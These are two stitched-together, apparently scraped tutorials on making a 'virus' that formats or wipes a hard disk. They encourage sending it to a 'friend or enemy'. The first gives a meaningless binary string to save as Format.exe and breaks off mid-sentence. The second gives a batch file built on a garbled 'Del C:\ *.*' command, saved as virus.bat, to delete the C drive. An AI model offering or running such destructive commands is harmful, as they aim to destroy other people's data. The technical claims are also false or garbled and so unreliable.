Virus to Format Hard Disk !!!

Today i will show you how to make a virus to format Hard disk. You can send this file to your friend or enemy to format their Hard disk. But please dont try thison your own computer or else you will end up formatting your own computer. Copy the below codes into Notepad. 01001011000111110010010101010101010000011111100000 Save the file as Format.exe You have created your

Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer. 1. Open Notepad and copy below code into it. @Echo off Del C:\ *.* |y 2. Then Save this file as virus.bat